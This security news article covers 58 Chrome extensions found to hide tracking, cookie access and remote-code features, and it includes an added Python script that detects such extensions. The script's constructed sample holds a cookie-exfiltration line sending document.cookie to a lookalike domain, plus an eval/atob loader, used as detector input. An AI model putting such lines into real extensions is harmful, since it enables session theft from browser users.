
Dozens of Chrome extensions, many of them featured on the Chrome Web Store but also hidden and not indexed by search engines, contain secret functionality to track users, a security researcher has discovered.
Secure Annex researcher John Tuckner uncovered a network of 58 Chrome extensions with six million total installs. They all gain overly broad permissions and contain hidden, potentially malicious functionality to access cookies and tokens, monitor user behavior, run remote code, and retrieve other sensitive data.
“There is significant command and control potential, like the ability to list top sites visited, open/close tabs, and get top sites visited,” the researcher said in a report.
These extensions masquerade as privacy or utility tools, from coupon‑finders to ad‑blockers, and some claim to protect users from other malicious extensions.
The Cybernews research team recently warned about the overly broad and invasive permissions many popular Chrome extensions usually gain upon installation. According to the analysis, 86 out of 100 extensions ask for highly dangerous permissions.
Tuckner’s list further demonstrates how dangerous extensions can be.
Most of the discovered extensions were unlisted, which means they are not visible to Chrome Web Store users or search engines. They can only be accessed via a direct link (URL), which can be delivered through malvertising campaigns, pop-ups, phishing schemes, fake update prompts, etc.
“Why are some of these extensions selected to be ‘Featured’ by Google when they are not discoverable by normal users? This blows my mind. Any normal user might interpret that status as the extension being verified and reputable. It should absolutely not be possible to be ‘Featured’ and not discoverable at the same time,” the researcher believes.
Tuckner initially identified 35 unlisted allegedly malicious extensions via a misspelled “unknow[.]com” domain. With Obsidian Security's help, the researcher updated the list to include additional extensions matching the behaviours. Google is aware of the research, according to Bleeping Computer.
The suspicious extensions have been reported to the tech giant, and the researcher continues to monitor their status.
“Luckily, some of these extensions have now been removed from the Chrome Web Store, but not all! Why is there such a discrepancy!” the researcher posted.
John Tuckner (@tuckner), April 16, 2025. Tracking here: https://t.co/iqgifTcC1g
Tuckner publicly shares a list of extensions found to contain suspicious functionalities. The most popular among them are the following extensions:
- Cuponomia - Coupon and Cashback: over 700,000 installs
- Fire Shield Extension Protection: over 300,000 installs
- Total Safety for Chrome: over 300,000 installs
- Browser Checkup for Chrome by Doctor: over 200,000 installs
- Protecto for Chrome: over 200,000 installs
- Browser WatchDog for Chrome: over 200,000 installs
- Securify for Chrome: over 200,000 installs
- Choose Your Chrome Tools: over 200,000 installs
- Securify Viewpoint Search: over 200,000 installs
The domains associated with the extensions use similar keywords. The report provides a full list of compromise indicators.
What indicates the extensions may be malicious?
All Chrome extensions have a manifest file that lists all the required permissions. Overly broad and intrusive permissions are the first clue, especially for extensions that only feature simple or trivial functions.
The second sign for Tuckner was misspelled domains (website addresses) that the extensions communicate with.
“Having worked in security for a while, a misspelling in a domain can really jump out at you, and unknow[.]com just looks too good.”
The researcher also discovered that the codebase for the actual claimed purpose was very minimal or missing entirely. Instead, Tuckner discovered heavily obfuscated code, raising many red flags.
“The ability for the extension’s configuration to be remotely controlled, and the capabilities in the browser extension’s code, is enough for me to come to the same conclusion that all of these extensions are a family of spyware or infostealers,” the researcher explained.
A deep dive into the code unveiled many capabilities, including cookie retrieval, tracking, configuring a new search provider, sending queries with referral parameters to capture revenue, etc.
All the discovered extensions used the same code patterns, had identical callback domain structures, used the network of misspelled domains, and had the same lists of permissions.
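The three indicators described above (overly broad manifest permissions, misspelled callback domains, and a minimal or obfuscated code base) can be checked mechanically before an extension is trusted. The following script is an added example, not code from the article or from Secure Annex; the manifest, the script text and the list of expected domains are constructed for the demonstration, and the thresholds are assumptions a reviewer would tune for their own environment.

```python
"""Audit a Chrome extension for the warning signs the article describes:
overly broad permissions, lookalike (misspelled) callback domains, and a
tiny or heavily obfuscated code base.

Added example, not code from the article or from Secure Annex. The manifest,
the script text and the expected-domain list are constructed for the demo.
"""
import json
import re
from difflib import SequenceMatcher

# Real Chrome permission names that give wide reach into the browser.
HIGH_RISK_PERMISSIONS = {
    "cookies", "tabs", "history", "webRequest", "webRequestBlocking",
    "webNavigation", "scripting", "management", "debugger", "proxy",
    "declarativeNetRequest", "nativeMessaging",
}
# Host patterns that match every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Constructed allow-list: domains a legitimate build is expected to contact.
EXPECTED_DOMAINS = ["example.com", "api.example.com", "googleapis.com"]

DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)
OBFUSCATION_MARKERS = ("eval(", "atob(", "fromCharCode", "\\x", "\\u00")


def risky_permissions(manifest):
    """Return (high-risk API permissions, wildcard host patterns)."""
    perms = set(manifest.get("permissions", []))
    # MV3 keeps host patterns in host_permissions; MV2 mixed them into permissions.
    hosts = set(manifest.get("host_permissions", [])) | perms
    return sorted(perms & HIGH_RISK_PERMISSIONS), sorted(hosts & BROAD_HOSTS)


def lookalike_domains(text, expected=EXPECTED_DOMAINS, threshold=0.8):
    """Flag domains in text that are near-misses of an expected domain."""
    found = {d.lower() for d in DOMAIN_RE.findall(text)}
    hits = []
    for dom in sorted(found - set(expected)):
        ref = max(expected, key=lambda e: SequenceMatcher(None, dom, e).ratio())
        ratio = SequenceMatcher(None, dom, ref).ratio()
        if ratio >= threshold:
            hits.append((dom, ref, round(ratio, 2)))
    return hits


def obfuscation_score(js):
    """Crude size and obfuscation heuristics over the extension's JavaScript."""
    lines = js.splitlines() or [""]
    avg_line = sum(len(line) for line in lines) / len(lines)
    markers = sum(js.count(m) for m in OBFUSCATION_MARKERS)
    return {
        "bytes": len(js),
        "avg_line_len": round(avg_line),
        "markers": markers,
        "tiny": len(js) < 2048,  # hardly any code for the claimed purpose (assumed cut-off)
        "suspicious": avg_line > 500 or markers >= 5,
    }


def audit(manifest, js):
    """Combine the three indicators into one report with a simple verdict."""
    perms, hosts = risky_permissions(manifest)
    lookalikes = lookalike_domains(json.dumps(manifest) + "\n" + js)
    obf = obfuscation_score(js)
    signals = []
    if len(perms) >= 2 or hosts:
        signals.append("broad permissions")
    if lookalikes:
        signals.append("lookalike domains")
    if obf["suspicious"]:
        signals.append("obfuscated code")
    if obf["tiny"]:
        signals.append("minimal code base")
    return {
        "risky_permissions": perms, "broad_hosts": hosts,
        "lookalike_domains": lookalikes, "obfuscation": obf,
        "signals": signals,
        "verdict": "suspicious" if len(signals) >= 2 else "review",
    }


# Constructed sample: a "coupon" extension that asks for everything and phones
# home to a one-letter-off domain using hex-escaped strings and eval/atob.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Coupon Finder (constructed sample)",
    "homepage_url": "https://example.com",
    "permissions": ["cookies", "tabs", "webRequest", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
}
SAMPLE_JS = (
    r'var _0x1=["\x63\x6f\x6f\x6b\x69\x65\x73"];'
    r'fetch("https://exampel.com/c?u="+btoa(document.cookie));'
    r'eval(atob(_0x1[0]));'
)

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_MANIFEST, SAMPLE_JS), indent=2))
```

To run it against an installed extension, load its `manifest.json` with `json.load` and concatenate its `.js` files into the `js` argument; the verdict is only a triage aid, and any "suspicious" result should be followed by reading the flagged code and domains by hand.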
Cybernews researchers warned that Chrome extension permissions are critical – they define what the add-on can access and control within the browser and system. We recommend regularly reviewing and removing unused extensions and following other recommendations.